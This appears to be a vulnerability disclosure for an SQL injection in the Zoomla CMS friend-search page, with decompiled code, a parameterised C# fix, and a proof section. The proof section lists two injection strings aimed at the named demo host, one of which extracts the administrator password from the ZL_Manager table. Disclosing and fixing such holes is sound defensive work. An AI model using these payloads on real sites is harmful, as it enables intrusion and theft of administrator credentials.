### Brief description:
See title.
### Details:
It even has an online chat feature, can you believe it.
Member center, online chat, find friend: http:demo.zoomla.cn/user/usertalk/SelectFrient.aspx. The search-by-nickname field is an injection point.
```
user/usertalk/SelectFrient.aspx
<%@ page language="C#" autoeventwireup="true" validaterequest="false" inherits="User_Usertalk_SelectFrient, App_Web_ekn5n2xj" enableviewstatemac="false" enableEventValidation="false" viewStateEncryptionMode="Never" %>
```
```
App_Web_ekn5n2xj.User_Usertalk_SelectFrient
button1_Click()
    // Lookup by ID: the input is converted to a number first, so this path is handled.
    cll = this.bu.GetuserTbUserBase(DataConverter.CLng(this.SelectID.Text));
    // Lookup by nickname: the raw text box value is passed straight through.
    cll = this.bu.GetuserTbUserBase(this.SelectName.Text);

string cmdText = "SELECT * FROM " + strTableName + " WHERE 1=1";
if (!string.IsNullOrEmpty(strVal))
{
    // strVal is concatenated into the LIKE clause with no parameterisation or escaping.
    cmdText = cmdText + " AND " + strField + " LIKE '%" + strVal + "%' ";
    return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null);
}
```
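The fix is to stop building the LIKE clause from the request string and bind the search value as a parameter, escaping the LIKE metacharacters so a nickname containing `%` or `_` still matches literally. The following is an added example written for this page, not Zoomla's code: it assumes a plain `SqlConnection` (the project's `SqlHelper.ExecuteTable` wrapper is not used, since its parameter-array signature is not shown on the page) and assumes that the table and column names come from a fixed whitelist inside the application, because identifiers cannot be bound as parameters.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

// Hardened replacement for the concatenated nickname lookup.
// Example code, not from the original page or project.
public static class SafeUserLookup
{
    // Assumed whitelist: only these identifiers may ever reach the SQL text.
    private static readonly HashSet<string> AllowedTables =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { "ZL_User" };
    private static readonly HashSet<string> AllowedFields =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { "UserName", "HoneyName" };

    // Escape SQL Server LIKE metacharacters so the user's text is matched literally.
    // '[' must be escaped first, otherwise the brackets added for '%' and '_' would be re-escaped.
    public static string EscapeLike(string value)
    {
        return value.Replace("[", "[[]")
                    .Replace("%", "[%]")
                    .Replace("_", "[_]");
    }

    public static DataTable FindByField(SqlConnection conn, string strTableName,
                                        string strField, string strVal)
    {
        if (!AllowedTables.Contains(strTableName))
            throw new ArgumentException("table not allowed", nameof(strTableName));
        if (!AllowedFields.Contains(strField))
            throw new ArgumentException("field not allowed", nameof(strField));

        // Identifiers are quoted with brackets after the whitelist check; the value is a parameter.
        string cmdText = "SELECT * FROM [" + strTableName + "] WHERE 1=1";

        using (var cmd = new SqlCommand())
        {
            cmd.Connection = conn;
            cmd.CommandType = CommandType.Text;

            if (!string.IsNullOrEmpty(strVal))
            {
                cmdText += " AND [" + strField + "] LIKE @pattern";
                // The wildcards are added here, around the escaped value, never inside the SQL string.
                cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value =
                    "%" + EscapeLike(strVal) + "%";
            }

            cmd.CommandText = cmdText;
            var table = new DataTable();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }
}
```

With the value bound as `@pattern`, the quote-and-comparison strings shown in the proof section below are simply searched for as nicknames and return no rows; the page directive's `validaterequest="false"` does not matter for this path, since request validation was never a defence against SQL injection in the first place.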
### Proof of vulnerability:
```
z%' and @@version>0 and '%'='
z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'='
```
![080203.jpg](https://images.seebug.org/upload/201408/021122452a7c76e01eb591390399b7bcbd5b8cb9.jpg)
![080204.jpg](https://images.seebug.org/upload/201408/0211225838458dcd73db6ccd8c4b5f27975580c3.jpg)